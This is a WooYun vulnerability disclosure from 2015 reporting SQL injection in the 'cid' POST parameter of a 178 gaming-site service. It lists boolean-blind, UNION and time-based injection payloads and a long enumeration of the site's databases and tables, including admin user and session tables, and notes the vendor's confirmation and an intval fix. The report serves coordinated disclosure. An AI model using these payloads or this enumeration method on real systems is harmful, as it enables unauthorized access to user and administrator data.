当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0113948

漏洞标题:178某业务SQL注入多库

相关厂商:178游戏网

漏洞作者: 小川

提交时间:2015-05-13 18:10

修复时间:2015-06-28 11:04

公开时间:2015-06-28 11:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-13: 细节已通知厂商并且等待厂商处理中
2015-05-14: 厂商已经确认,细节仅向厂商公开
2015-05-24: 细节向核心白帽子及相关领域专家公开
2015-06-03: 细节向普通白帽子公开
2015-06-13: 细节向实习白帽子公开
2015-06-28: 细节向公众公开

简要描述:

不小心,捡来的

详细说明:

ragecomic.png

漏洞证明:

Parameter: cid (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cid=1 AND 3022=3022
    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: cid=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a6b7171,0x57545371584357714d6d,0x716a6a7a71),NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cid=1 AND SLEEP(5)
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.11
Database: sns_album
[16 tables]
+---------------------------------------+
| app_album_cite_acg_albuminfo          |
| app_cite_album                        |
| app_cite_photo                        |
| apps_album_active                     |
| apps_album_activelog                  |
| apps_album_category                   |
| apps_album_category_bak               |
| apps_album_class                      |
| apps_album_friends                    |
| apps_album_photo                      |
| apps_album_photo_bak                  |
| apps_album_theme                      |
| apps_photo_diglog                     |
| apps_rating                           |
| apps_rating_log                       |
| apps_rating_photo                     |
+---------------------------------------+
Database: sns_get_armory
[1 table]
+---------------------------------------+
| armory_raw_data                       |
+---------------------------------------+
Database: sns_gsrank
[419 tables]
+---------------------------------------+
| app_armory_gs                         |
| app_armory_gs_realm                   |
| app_armory_gs_realm_1                 |
| app_armory_gs_realm_10                |
| app_armory_gs_realm_100               |
| app_armory_gs_realm_101               |
| app_armory_gs_realm_102               |
| app_armory_gs_realm_103               |
| app_armory_gs_realm_104               |
| app_armory_gs_realm_105               |
| app_armory_gs_realm_106               |
| app_armory_gs_realm_107               |
| app_armory_gs_realm_108               |
| app_armory_gs_realm_109               |
| app_armory_gs_realm_11                |
| app_armory_gs_realm_110               |
| app_armory_gs_realm_111               |
| app_armory_gs_realm_112               |
| app_armory_gs_realm_113               |
| app_armory_gs_realm_114               |
| app_armory_gs_realm_115               |
| app_armory_gs_realm_116               |
| app_armory_gs_realm_117               |
| app_armory_gs_realm_118               |
| app_armory_gs_realm_119               |
| app_armory_gs_realm_12                |
| app_armory_gs_realm_120               |
| app_armory_gs_realm_121               |
| app_armory_gs_realm_122               |
| app_armory_gs_realm_123               |
| app_armory_gs_realm_124               |
| app_armory_gs_realm_125               |
| app_armory_gs_realm_126               |
| app_armory_gs_realm_127               |
| app_armory_gs_realm_128               |
| app_armory_gs_realm_129               |
| app_armory_gs_realm_13                |
| app_armory_gs_realm_130               |
| app_armory_gs_realm_131               |
| app_armory_gs_realm_132               |
| app_armory_gs_realm_133               |
| app_armory_gs_realm_134               |
| app_armory_gs_realm_135               |
| app_armory_gs_realm_136               |
| app_armory_gs_realm_137               |
| app_armory_gs_realm_138               |
| app_armory_gs_realm_139               |
| app_armory_gs_realm_14                |
| app_armory_gs_realm_140               |
| app_armory_gs_realm_141               |
| app_armory_gs_realm_142               |
| app_armory_gs_realm_143               |
| app_armory_gs_realm_144               |
| app_armory_gs_realm_145               |
| app_armory_gs_realm_146               |
| app_armory_gs_realm_147               |
| app_armory_gs_realm_148               |
| app_armory_gs_realm_149               |
| app_armory_gs_realm_15                |
| app_armory_gs_realm_150               |
| app_armory_gs_realm_151               |
| app_armory_gs_realm_152               |
| app_armory_gs_realm_153               |
| app_armory_gs_realm_154               |
| app_armory_gs_realm_155               |
| app_armory_gs_realm_156               |
| app_armory_gs_realm_157               |
| app_armory_gs_realm_158               |
| app_armory_gs_realm_159               |
| app_armory_gs_realm_16                |
| app_armory_gs_realm_160               |
| app_armory_gs_realm_161               |
| app_armory_gs_realm_162               |
| app_armory_gs_realm_163               |
| app_armory_gs_realm_164               |
| app_armory_gs_realm_165               |
| app_armory_gs_realm_166               |
| app_armory_gs_realm_167               |
| app_armory_gs_realm_168               |
| app_armory_gs_realm_169               |
| app_armory_gs_realm_17                |
| app_armory_gs_realm_170               |
| app_armory_gs_realm_171               |
| app_armory_gs_realm_172               |
| app_armory_gs_realm_173               |
| app_armory_gs_realm_174               |
| app_armory_gs_realm_175               |
| app_armory_gs_realm_176               |
| app_armory_gs_realm_177               |
| app_armory_gs_realm_178               |
| app_armory_gs_realm_179               |
| app_armory_gs_realm_18                |
| app_armory_gs_realm_180               |
| app_armory_gs_realm_181               |
| app_armory_gs_realm_182               |
| app_armory_gs_realm_183               |
| app_armory_gs_realm_184               |
| app_armory_gs_realm_185               |
| app_armory_gs_realm_186               |
| app_armory_gs_realm_187               |
| app_armory_gs_realm_188               |
| app_armory_gs_realm_189               |
| app_armory_gs_realm_19                |
| app_armory_gs_realm_190               |
| app_armory_gs_realm_191               |
| app_armory_gs_realm_192               |
| app_armory_gs_realm_193               |
| app_armory_gs_realm_194               |
| app_armory_gs_realm_195               |
| app_armory_gs_realm_196               |
| app_armory_gs_realm_197               |
| app_armory_gs_realm_198               |
| app_armory_gs_realm_199               |
| app_armory_gs_realm_2                 |
| app_armory_gs_realm_20                |
| app_armory_gs_realm_200               |
| app_armory_gs_realm_201               |
| app_armory_gs_realm_202               |
| app_armory_gs_realm_203               |
| app_armory_gs_realm_204               |
| app_armory_gs_realm_205               |
| app_armory_gs_realm_206               |
| app_armory_gs_realm_207               |
| app_armory_gs_realm_208               |
| app_armory_gs_realm_209               |
| app_armory_gs_realm_21                |
| app_armory_gs_realm_210               |
| app_armory_gs_realm_211               |
| app_armory_gs_realm_212               |
| app_armory_gs_realm_213               |
| app_armory_gs_realm_214               |
| app_armory_gs_realm_215               |
| app_armory_gs_realm_216               |
| app_armory_gs_realm_217               |
| app_armory_gs_realm_218               |
| app_armory_gs_realm_219               |
| app_armory_gs_realm_22                |
| app_armory_gs_realm_220               |
| app_armory_gs_realm_221               |
| app_armory_gs_realm_222               |
| app_armory_gs_realm_223               |
| app_armory_gs_realm_224               |
| app_armory_gs_realm_225               |
| app_armory_gs_realm_226               |
| app_armory_gs_realm_227               |
| app_armory_gs_realm_228               |
| app_armory_gs_realm_229               |
| app_armory_gs_realm_23                |
| app_armory_gs_realm_230               |
| app_armory_gs_realm_231               |
| app_armory_gs_realm_232               |
| app_armory_gs_realm_233               |
| app_armory_gs_realm_234               |
| app_armory_gs_realm_235               |
| app_armory_gs_realm_236               |
| app_armory_gs_realm_237               |
| app_armory_gs_realm_238               |
| app_armory_gs_realm_239               |
| app_armory_gs_realm_24                |
| app_armory_gs_realm_240               |
| app_armory_gs_realm_241               |
| app_armory_gs_realm_242               |
| app_armory_gs_realm_243               |
| app_armory_gs_realm_244               |
| app_armory_gs_realm_245               |
| app_armory_gs_realm_246               |
| app_armory_gs_realm_247               |
| app_armory_gs_realm_248               |
| app_armory_gs_realm_249               |
| app_armory_gs_realm_25                |
| app_armory_gs_realm_250               |
| app_armory_gs_realm_251               |
| app_armory_gs_realm_252               |
| app_armory_gs_realm_253               |
| app_armory_gs_realm_254               |
| app_armory_gs_realm_255               |
| app_armory_gs_realm_256               |
| app_armory_gs_realm_257               |
| app_armory_gs_realm_258               |
| app_armory_gs_realm_259               |
| app_armory_gs_realm_26                |
| app_armory_gs_realm_260               |
| app_armory_gs_realm_261               |
| app_armory_gs_realm_262               |
| app_armory_gs_realm_263               |
| app_armory_gs_realm_264               |
| app_armory_gs_realm_265               |
| app_armory_gs_realm_266               |
| app_armory_gs_realm_267               |
| app_armory_gs_realm_268               |
| app_armory_gs_realm_269               |
| app_armory_gs_realm_27                |
| app_armory_gs_realm_270               |
| app_armory_gs_realm_271               |
| app_armory_gs_realm_272               |
| app_armory_gs_realm_273               |
| app_armory_gs_realm_274               |
| app_armory_gs_realm_275               |
| app_armory_gs_realm_276               |
| app_armory_gs_realm_277               |
| app_armory_gs_realm_278               |
| app_armory_gs_realm_279               |
| app_armory_gs_realm_28                |
| app_armory_gs_realm_280               |
| app_armory_gs_realm_281               |
| app_armory_gs_realm_282               |
| app_armory_gs_realm_283               |
| app_armory_gs_realm_284               |
| app_armory_gs_realm_285               |
| app_armory_gs_realm_286               |
| app_armory_gs_realm_287               |
| app_armory_gs_realm_288               |
| app_armory_gs_realm_289               |
| app_armory_gs_realm_29                |
| app_armory_gs_realm_290               |
| app_armory_gs_realm_291               |
| app_armory_gs_realm_292               |
| app_armory_gs_realm_293               |
| app_armory_gs_realm_294               |
| app_armory_gs_realm_295               |
| app_armory_gs_realm_296               |
| app_armory_gs_realm_297               |
| app_armory_gs_realm_298               |
| app_armory_gs_realm_299               |
| app_armory_gs_realm_3                 |
| app_armory_gs_realm_30                |
| app_armory_gs_realm_300               |
| app_armory_gs_realm_301               |
| app_armory_gs_realm_302               |
| app_armory_gs_realm_303               |
| app_armory_gs_realm_304               |
| app_armory_gs_realm_305               |
| app_armory_gs_realm_306               |
| app_armory_gs_realm_307               |
| app_armory_gs_realm_308               |
| app_armory_gs_realm_309               |
| app_armory_gs_realm_31                |
| app_armory_gs_realm_310               |
| app_armory_gs_realm_311               |
| app_armory_gs_realm_312               |
| app_armory_gs_realm_313               |
| app_armory_gs_realm_314               |
| app_armory_gs_realm_315               |
| app_armory_gs_realm_316               |
| app_armory_gs_realm_317               |
| app_armory_gs_realm_318               |
| app_armory_gs_realm_319               |
| app_armory_gs_realm_32                |
| app_armory_gs_realm_320               |
| app_armory_gs_realm_321               |
| app_armory_gs_realm_322               |
| app_armory_gs_realm_323               |
| app_armory_gs_realm_324               |
| app_armory_gs_realm_325               |
| app_armory_gs_realm_326               |
| app_armory_gs_realm_327               |
| app_armory_gs_realm_328               |
| app_armory_gs_realm_329               |
| app_armory_gs_realm_33                |
| app_armory_gs_realm_330               |
| app_armory_gs_realm_331               |
| app_armory_gs_realm_332               |
| app_armory_gs_realm_333               |
| app_armory_gs_realm_334               |
| app_armory_gs_realm_335               |
| app_armory_gs_realm_336               |
| app_armory_gs_realm_337               |
| app_armory_gs_realm_338               |
| app_armory_gs_realm_339               |
| app_armory_gs_realm_34                |
| app_armory_gs_realm_340               |
| app_armory_gs_realm_341               |
| app_armory_gs_realm_342               |
| app_armory_gs_realm_343               |
| app_armory_gs_realm_344               |
| app_armory_gs_realm_345               |
| app_armory_gs_realm_346               |
| app_armory_gs_realm_347               |
| app_armory_gs_realm_348               |
| app_armory_gs_realm_349               |
| app_armory_gs_realm_35                |
| app_armory_gs_realm_350               |
| app_armory_gs_realm_351               |
| app_armory_gs_realm_352               |
| app_armory_gs_realm_353               |
| app_armory_gs_realm_354               |
| app_armory_gs_realm_355               |
| app_armory_gs_realm_356               |
| app_armory_gs_realm_357               |
| app_armory_gs_realm_358               |
| app_armory_gs_realm_359               |
| app_armory_gs_realm_36                |
| app_armory_gs_realm_360               |
| app_armory_gs_realm_361               |
| app_armory_gs_realm_362               |
| app_armory_gs_realm_363               |
| app_armory_gs_realm_364               |
| app_armory_gs_realm_365               |
| app_armory_gs_realm_366               |
| app_armory_gs_realm_367               |
| app_armory_gs_realm_368               |
| app_armory_gs_realm_369               |
| app_armory_gs_realm_37                |
| app_armory_gs_realm_370               |
| app_armory_gs_realm_371               |
| app_armory_gs_realm_372               |
| app_armory_gs_realm_373               |
| app_armory_gs_realm_374               |
| app_armory_gs_realm_375               |
| app_armory_gs_realm_376               |
| app_armory_gs_realm_377               |
| app_armory_gs_realm_378               |
| app_armory_gs_realm_379               |
| app_armory_gs_realm_38                |
| app_armory_gs_realm_380               |
| app_armory_gs_realm_381               |
| app_armory_gs_realm_382               |
| app_armory_gs_realm_383               |
| app_armory_gs_realm_384               |
| app_armory_gs_realm_385               |
| app_armory_gs_realm_386               |
| app_armory_gs_realm_387               |
| app_armory_gs_realm_388               |
| app_armory_gs_realm_389               |
| app_armory_gs_realm_39                |
| app_armory_gs_realm_390               |
| app_armory_gs_realm_391               |
| app_armory_gs_realm_392               |
| app_armory_gs_realm_393               |
| app_armory_gs_realm_394               |
| app_armory_gs_realm_395               |
| app_armory_gs_realm_396               |
| app_armory_gs_realm_397               |
| app_armory_gs_realm_398               |
| app_armory_gs_realm_399               |
| app_armory_gs_realm_4                 |
| app_armory_gs_realm_40                |
| app_armory_gs_realm_400               |
| app_armory_gs_realm_401               |
| app_armory_gs_realm_402               |
| app_armory_gs_realm_403               |
| app_armory_gs_realm_404               |
| app_armory_gs_realm_405               |
| app_armory_gs_realm_406               |
| app_armory_gs_realm_407               |
| app_armory_gs_realm_408               |
| app_armory_gs_realm_409               |
| app_armory_gs_realm_41                |
| app_armory_gs_realm_410               |
| app_armory_gs_realm_411               |
| app_armory_gs_realm_412               |
| app_armory_gs_realm_413               |
| app_armory_gs_realm_414               |
| app_armory_gs_realm_42                |
| app_armory_gs_realm_43                |
| app_armory_gs_realm_44                |
| app_armory_gs_realm_45                |
| app_armory_gs_realm_46                |
| app_armory_gs_realm_47                |
| app_armory_gs_realm_48                |
| app_armory_gs_realm_49                |
| app_armory_gs_realm_5                 |
| app_armory_gs_realm_50                |
| app_armory_gs_realm_51                |
| app_armory_gs_realm_52                |
| app_armory_gs_realm_53                |
| app_armory_gs_realm_54                |
| app_armory_gs_realm_55                |
| app_armory_gs_realm_56                |
| app_armory_gs_realm_57                |
| app_armory_gs_realm_58                |
| app_armory_gs_realm_59                |
| app_armory_gs_realm_6                 |
| app_armory_gs_realm_60                |
| app_armory_gs_realm_61                |
| app_armory_gs_realm_62                |
| app_armory_gs_realm_63                |
| app_armory_gs_realm_64                |
| app_armory_gs_realm_65                |
| app_armory_gs_realm_66                |
| app_armory_gs_realm_67                |
| app_armory_gs_realm_68                |
| app_armory_gs_realm_69                |
| app_armory_gs_realm_7                 |
| app_armory_gs_realm_70                |
| app_armory_gs_realm_71                |
| app_armory_gs_realm_72                |
| app_armory_gs_realm_73                |
| app_armory_gs_realm_74                |
| app_armory_gs_realm_75                |
| app_armory_gs_realm_76                |
| app_armory_gs_realm_77                |
| app_armory_gs_realm_78                |
| app_armory_gs_realm_79                |
| app_armory_gs_realm_8                 |
| app_armory_gs_realm_80                |
| app_armory_gs_realm_81                |
| app_armory_gs_realm_82                |
| app_armory_gs_realm_83                |
| app_armory_gs_realm_84                |
| app_armory_gs_realm_85                |
| app_armory_gs_realm_86                |
| app_armory_gs_realm_87                |
| app_armory_gs_realm_88                |
| app_armory_gs_realm_89                |
| app_armory_gs_realm_9                 |
| app_armory_gs_realm_90                |
| app_armory_gs_realm_91                |
| app_armory_gs_realm_92                |
| app_armory_gs_realm_93                |
| app_armory_gs_realm_94                |
| app_armory_gs_realm_95                |
| app_armory_gs_realm_96                |
| app_armory_gs_realm_97                |
| app_armory_gs_realm_98                |
| app_armory_gs_realm_99                |
| app_armory_gs_realm_guild             |
| app_armory_gs_region_cn               |
| app_armory_gs_region_tw               |
+---------------------------------------+
Database: sns_cite
[19 tables]
+---------------------------------------+
| app_cite_bad_words                    |
| app_cite_badword                      |
| app_cite_black_list                   |
| app_cite_essential                    |
| app_cite_essential_index              |
| app_cite_essential_list               |
| app_cite_fuzzy_words                  |
| app_cite_list                         |
| app_cite_logs                         |
| app_cite_resource                     |
| app_cite_syslist                      |
| app_cite_sysres                       |
| app_cite_taglist                      |
| app_cite_taglist_tmp                  |
| app_cite_tags                         |
| app_cite_vote_log                     |
| app_cite_vote_words                   |
| app_cite_votes                        |
| app_cite_weibo_static                 |
+---------------------------------------+
Database: sns_blog
[4 tables]
+---------------------------------------+
| apps_blog_category                    |
| apps_blog_last                        |
| apps_blog_thread                      |
| apps_blog_visit                       |
+---------------------------------------+
Database: test
[1 table]
+---------------------------------------+
| t                                     |
+---------------------------------------+
Database: game
[20 tables]
+---------------------------------------+
| area                                  |
| carriers                              |
| charecteristic                        |
| charge                                |
| developers                            |
| game_badge                            |
| game_badge_user                       |
| game_data                             |
| game_data_bak                         |
| game_day_statics                      |
| game_info                             |
| game_month_statics                    |
| game_op_log                           |
| game_type                             |
| game_user_game                        |
| game_week_log                         |
| game_week_statics                     |
| ku_game                               |
| picture_type                          |
| test_state                            |
+---------------------------------------+
Database: sns_group
[6 tables]
+---------------------------------------+
| app_group                             |
| app_group_visitor                     |
| app_thread                            |
| app_thread_comment                    |
| app_thread_member                     |
| app_thread_my                         |
+---------------------------------------+
Database: sns2
[218 tables]
+---------------------------------------+
| animation_subscribe                   |
| animations                            |
| annual                                |
| app_active                            |
| app_active_contact                    |
| app_active_hero                       |
| app_active_user                       |
| app_armory                            |
| app_armory_accept_log                 |
| app_armory_approve                    |
| app_armory_chang_fail                 |
| app_armory_cn_enchantment             |
| app_armory_cn_gem                     |
| app_armory_ctm                        |
| app_armory_ctm_event_log              |
| app_armory_data_0                     |
| app_armory_data_1                     |
| app_armory_data_2                     |
| app_armory_data_3                     |
| app_armory_data_4                     |
| app_armory_data_5                     |
| app_armory_data_6                     |
| app_armory_data_8                     |
| app_armory_data_9                     |
| app_armory_event_info                 |
| app_armory_get_fail_                  |
| app_armory_item                       |
| app_armory_item_                      |
| app_armory_item_glyphs                |
| app_armory_new_user                   |
| app_armory_queue                      |
| app_armory_relation                   |
| app_armory_snapshot                   |
| app_armory_tongji                     |
| app_armory_tw_gem                     |
| app_armory_visit_num                  |
| app_armroy_event_gift_user            |
| app_armroy_event_user_address         |
| app_attention                         |
| app_attention_group                   |
| app_attention_group_relate            |
| app_attention_remark                  |
| app_attention_request                 |
| app_attentions                        |
| app_attentions_old                    |
| app_avatar_log                        |
| app_badusers                          |
| app_bind                              |
| app_bind_logs                         |
| app_bind_note                         |
| app_bind_server                       |
| app_buff_list                         |
| app_buff_log                          |
| app_buff_skills                       |
| app_buff_user                         |
| app_cite_list                         |
| app_cite_log                          |
| app_cite_ngalist                      |
| app_cite_poll_key                     |
| app_cite_poll_log                     |
| app_cite_resourse                     |
| app_cite_taglist                      |
| app_cite_taglist_tmp                  |
| app_cite_tags                         |
| app_com_mycomment                     |
| app_com_post                          |
| app_com_recive                        |
| app_com_resources                     |
| app_com_state                         |
| app_com_thread                        |
| app_dh_viewlog                        |
| app_duel_player                       |
| app_ext_extcredit                     |
| app_ext_info                          |
| app_favorite_category                 |
| app_favorite_item                     |
| app_favorite_items                    |
| app_favorite_owners                   |
| app_favorite_relations                |
| app_favorite_tags                     |
| app_feed                              |
| app_feed_relation_0                   |
| app_feed_relation_1                   |
| app_feed_relation_2                   |
| app_feed_relation_3                   |
| app_feed_relation_4                   |
| app_feed_relation_5                   |
| app_feed_relation_6                   |
| app_feed_relation_7                   |
| app_feed_relation_8                   |
| app_feed_relation_9                   |
| app_footprint                         |
| app_friends_invitation                |
| app_game_info                         |
| app_game_my_info                      |
| app_game_my_info_bak20120405          |
| app_game_my_info_bak20120409          |
| app_game_my_info_data                 |
| app_game_my_info_list                 |
| app_game_my_type                      |
| app_game_type                         |
| app_gift_list                         |
| app_gift_log                          |
| app_gift_transfer_card                |
| app_gift_transfer_card_uselog         |
| app_gift_transfer_focus               |
| app_gift_transfer_item                |
| app_gift_transfer_item_bak11          |
| app_gift_transfer_lottery_log         |
| app_gift_transfer_reward              |
| app_gift_transfer_reward_center       |
| app_gift_transfer_route_0             |
| app_gift_transfer_user_lastone        |
| app_gift_transfer_user_log            |
| app_guild_invite                      |
| app_guild_invite_log                  |
| app_imhot                             |
| app_login_statistics                  |
| app_medal                             |
| app_medal_user                        |
| app_mh_viewlog                        |
| app_notify_log                        |
| app_poll_body                         |
| app_poll_key                          |
| app_poll_key_log                      |
| app_poll_subject_log                  |
| app_presti                            |
| app_presti_acg_name                   |
| app_quest                             |
| app_quest_brick_log                   |
| app_quest_categories                  |
| app_quest_daily_log                   |
| app_quest_dare_deathlog               |
| app_quest_dare_log                    |
| app_quest_done_log                    |
| app_quest_extend                      |
| app_quest_forum                       |
| app_quest_log                         |
| app_quest_record                      |
| app_quest_statistic                   |
| app_res_dh                            |
| app_res_dh_chapter                    |
| app_res_mh                            |
| app_res_mh_chapter                    |
| app_res_xs                            |
| app_res_xs_chapter                    |
| app_reward                            |
| app_reward_log                        |
| app_reward_record                     |
| app_rss                               |
| app_sms_announcement                  |
| app_sms_announcement_log              |
| app_sms_citenotice                    |
| app_sms_count                         |
| app_sms_daily_record                  |
| app_sms_delete_log                    |
| app_sms_ms                            |
| app_sms_notice                        |
| app_sms_notice_0                      |
| app_sms_notice_1                      |
| app_sms_notice_2                      |
| app_sms_notice_3                      |
| app_sms_notice_4                      |
| app_sms_notice_5                      |
| app_sms_notice_6                      |
| app_sms_notice_7                      |
| app_sms_notice_8                      |
| app_sms_notice_9                      |
| app_sms_notice_reciever               |
| app_sms_reciever                      |
| app_sms_session                       |
| app_sms_statistic                     |
| app_tags                              |
| app_tags_relation                     |
| app_talent                            |
| app_talent_action                     |
| app_talent_res                        |
| app_talent_script                     |
| app_user_template                     |
| app_view_log                          |
| app_view_statics                      |
| app_wb_quest                          |
| app_wish                              |
| app_wish_action                       |
| app_wish_god                          |
| app_wish_god_response                 |
| app_wish_item_rank                    |
| app_wish_user                         |
| app_xs_viewlog                        |
| apps_album_category                   |
| apps_album_photo                      |
| apps_blog_category                    |
| apps_blog_thread                      |
| apps_blog_visit                       |
| armory_queue                          |
| bad_sms_session                       |
| cartoon_subscribe                     |
| comics                                |
| dkp_cancel_subscribe                  |
| dkp_subscribe                         |
| fiction_subscribe                     |
| level_exp_bak                         |
| master_slave_test                     |
| operate_log                           |
| operate_log_statistics                |
| prop_online                           |
| prop_standard                         |
| prop_standard2                        |
| prop_standard_close                   |
| quest_visit_log                       |
| resource_rating                       |
| sms_subscribe_list_data               |
| sms_subscribe_pinyin_data             |
| test                                  |
| tmp_reward_log                        |
| tmp_reword                            |
| tmp_sms_ids                           |
| user_game_bind                        |
+---------------------------------------+
Database: sns_api
[10 tables]
+---------------------------------------+
| app_activation_code                   |
| app_activation_code_stat              |
| sns_api_count                         |
| sns_api_log                           |
| sns_api_log_178                       |
| sns_api_log_slow                      |
| sns_api_nga_log                       |
| sns_app                               |
| sns_profile                           |
| sns_user_app                          |
+---------------------------------------+
Database: sns_admin
[9 tables]
+---------------------------------------+
| _resources                            |
| _roles                                |
| _sessions                             |
| _users                                |
| operate_log                           |
| operate_log_statistics                |
| priv_roles                            |
| priv_users                            |
| user_roles                            |
+---------------------------------------+
Database: sns_bet
[34 tables]
+---------------------------------------+
| app_bet_games                         |
| app_bet_gift_list                     |
| app_bet_list                          |
| app_bet_maps                          |
| app_bet_match_rich_5                  |
| app_bet_match_rich_6                  |
| app_bet_match_rich_7                  |
| app_bet_matchs                        |
| app_bet_player_log                    |
| app_bet_playerdata                    |
| app_bet_profit_list                   |
| app_bet_races                         |
| app_bet_roll_apps                     |
| app_bet_seasions                      |
| app_bet_user_chipin_log               |
| app_bet_user_gift_log                 |
| app_bet_user_info                     |
| app_bet_user_riches_20101128          |
| app_bet_user_riches_20101205          |
| app_bet_user_riches_20101205_bak      |
| app_bet_user_riches_20101212          |
| app_bet_user_riches_20101220          |
| app_bet_user_riches_20110107          |
| app_bet_user_riches_20110114          |
| app_bet_user_riches_20110121          |
| app_bet_user_riches_20110128          |
| app_bet_user_riches_20110204          |
| app_bet_user_riches_20110221          |
| app_bet_user_riches_20110320          |
| app_bet_user_riches_20110418          |
| app_bet_user_riches_20110515          |
| app_bet_user_riches_20110612          |
| app_bet_user_riches_20110714          |
| app_bet_user_well                     |
+---------------------------------------+

修复方案:

intval

版权声明:转载请注明来源 小川@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-05-14 11:02

厂商回复:

确实比较隐蔽,感谢洞主对完美世界的关注,我们将尽快修补漏洞,谢谢!

最新状态:

暂无